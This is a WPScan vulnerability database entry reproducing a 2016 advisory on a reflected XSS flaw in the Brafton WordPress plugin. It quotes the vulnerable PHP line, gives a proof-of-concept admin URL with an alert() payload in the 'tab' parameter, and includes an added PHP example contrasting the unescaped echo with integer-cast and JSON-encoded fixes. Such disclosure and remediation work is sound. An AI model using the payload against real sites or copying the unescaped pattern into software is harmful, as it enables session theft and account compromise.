brafton WordPress Plugin <=3.4.7 - Reflected XSS


Description
Title - Brafton WordPress Plugin XSS
 
# Exploit Title : XSS vulnerability in Brafton WordPress Plugin
# Date: Fri May 20  2016
# Reported Date : Fri May 20  2016
# Vendor Homepage: http://www.brafton.com/support/wordpress/
# Version: v3.3.10 – January 2016
# Software Link: https://github.com/ContentLEAD/BraftonWordpressPlugin/archive/master.zip
# Exploit Author : MehrdadLinux
# Tested On : Linux Platforms.
# Fix/Patching : Update To 
# Facebook : https://facebook.com/MehrdadLinux
# Twitter : http://twitter.com/MehrdadLinux
# Detailed Vul: http://blog.opsnit.com
===========================================================================================

1. VULNERABILITY
-------------------------
 
Brafton WordPress Plugin v3.3.10 – January 2016


2. BACKGROUND
-------------------------
This is the WordPress plugin for Brafton.

Brafton is a content marketing agency.
Our in-house teams develop and execute SEO-optimized content strategies,
from news to infographics.


3. DESCRIPTION
-------------------------
XSS in BraftonAdminPage.php

In line 11 the value of the 'tab' GET parameter is echoed unmodified into an inline JavaScript assignment:
	tab = <?php if(isset($_GET['tab'])){ echo $_GET['tab'];} else{ echo 0;}?>;

Because no validation or output encoding for the JavaScript context is applied, a crafted 'tab' value is written straight into the script and executed by the browser, for example:

wordpress/wp-admin/admin.php?page=BraftonArticleLoader&tab=alert(String.fromCharCode(77,101,104,114,100,97,100,76,105,110,117,120,32,88,83,83))
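Added here as an illustration, not the plugin's code or the fix shipped in 3.4.8: the echo pattern quoted above rebuilt as a function beside two hardened variants, one enforcing the integer type the default value 0 implies (absint() in WordPress) and one encoding the value as a JSON literal for the JavaScript context (wp_json_encode() in WordPress). The function names and the constructed request are assumptions.

```php
<?php
// Added example, not code from BraftonWordpressPlugin.
// Assumption: the page emits an inline <script> and 'tab' selects a numeric
// admin tab, which is why the original falls back to 0.

// Vulnerable: the raw query value is concatenated into a JavaScript statement,
// so any characters the browser treats as code are executed.
function render_tab_vulnerable(array $get): string {
    $tab = isset($get['tab']) ? $get['tab'] : 0;
    return "tab = " . $tab . ";";
}

// Hardened (a): the value is only ever an index, so force it to an integer.
// A non-numeric payload collapses to 0 and nothing but digits reaches the script.
function render_tab_int(array $get): string {
    $tab = isset($get['tab']) ? (int) $get['tab'] : 0;   // absint() in WordPress
    return "tab = " . $tab . ";";
}

// Hardened (b): if a string really is needed, emit it as a JSON literal so
// quotes, '<', '>' and '&' are hex-escaped and the value can only ever be a
// JavaScript string, never a statement.
function render_tab_json(array $get): string {
    $tab = isset($get['tab']) ? (string) $get['tab'] : '0';
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return "tab = " . json_encode($tab, $flags) . ";";  // wp_json_encode() in WordPress
}

// Constructed request mirroring the advisory's PoC parameter.
$request = ['tab' => 'alert(String.fromCharCode(77,101,104))'];

echo render_tab_vulnerable($request), PHP_EOL;  // payload lands as executable code
echo render_tab_int($request), PHP_EOL;         // payload discarded, integer only
echo render_tab_json($request), PHP_EOL;        // payload kept, but as a quoted string
```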


4. DISCOVERED BY
-------------------------
 
The vulnerability has been discovered by Mehrdad Abbasi (MehrdadLinux) and Hossein Masoudi (cs.masoudi).
email : MehrdadLinux (at) gmail (dot) com
http://opsnit.com

 
5. LEGAL NOTICES
-------------------------
 
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.
 

Affects

Plugin BraftonWordpressPlugin
fixed in version 3.4.8

References

URL http://www.openwall.com/lists/oss-security/2016/05/20/5
URL http://www.brafton.com/support/wordpress/
URL https://github.com/ContentLEAD/BraftonWordpressPlugin
URL https://github.com/ContentLEAD/BraftonWordpressPlugin/pull/70
URL https://github.com/ContentLEAD/BraftonWordpressPlugin/issues/64

Classification

Type XSS
OWASP Top 10 A3: Cross-Site Scripting (XSS)
CWE CWE-79

Miscellaneous

Submitter Mehrdadlinux
Submitter Website www.Opsnit.com
Submitter Twitter https://twitter.com/MehrdadLinux
Verified No
WPVDB ID 8614

Timeline

Publicly Published 2016-05-20 (7 months ago)
Added 2016-09-07 (3 months ago)
Last Updated 2016-09-07 (3 months ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.